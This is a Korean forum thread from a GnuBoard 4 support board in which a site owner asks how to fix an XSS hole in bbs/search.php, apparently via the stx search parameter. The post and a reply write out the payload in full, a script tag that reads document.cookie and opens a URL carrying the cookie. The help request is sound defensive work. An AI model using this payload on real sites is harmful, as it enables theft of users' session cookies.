SIR

게시판에 아래 키워드를 입력하면..

나즈나
프로필 보기이 회원 글보기이 회원의 댓글보기
 · 14년 전 · 888 · 2
이 키워드를 입력하면 사이트에 에러가 나버리는데요..
계속 누가 악질적으로 이짓을해서 일단 검색을 아예 빼버렷는데
"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>
이걸 bbs/search.php에 날리면 그대로 먹히거든요;;
어떻게 해결하죠..ㄷㄷ
|
글쓰기

댓글 2개

취약점
프로필 보기이 회원 글보기이 회원의 댓글보기
 14년 전
구체적으로 설명을해주셔야할것같습니다.
예를들어

http://test.com/gnu4/bbs/search.php?"><script>alert(document.cookie);%20var%20url%20=%20'http://localhost/'+document.cookie;%20window.open(url);</script>

이런식으로요.

어떤변수에어떻게넣는지 그런게 중요할듯하네요.
나즈나
프로필 보기이 회원 글보기이 회원의 댓글보기
 14년 전
검색이니까 당연히 stx아닐까요.ㄷㄷ
검색 파일에 외부에서 변수받아오는 것은 stx 뿐인걸로 아는데요..
이전글목록다음글
댓글을 작성하시려면 로그인이 필요합니다. 로그인

그누4 질문답변

그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기 기존 게시물은 열람만 가능합니다.

+
제목 글쓴이 날짜 조회
14년 전 조회 781
14년 전 조회 5,614
14년 전 조회 5,046
14년 전 조회 1,607
14년 전 조회 741
14년 전 조회 564
14년 전 조회 905
14년 전 조회 789
14년 전 조회 956
14년 전 조회 889
14년 전 조회 959
14년 전 조회 6,676
14년 전 조회 1,631
14년 전 조회 1,608
14년 전 조회 1,703
14년 전 조회 1,657
14년 전 조회 1,003
14년 전 조회 573
14년 전 조회 781
14년 전 조회 1,394
이전 첫 페이지 다음
글쓰기
🐛 버그신고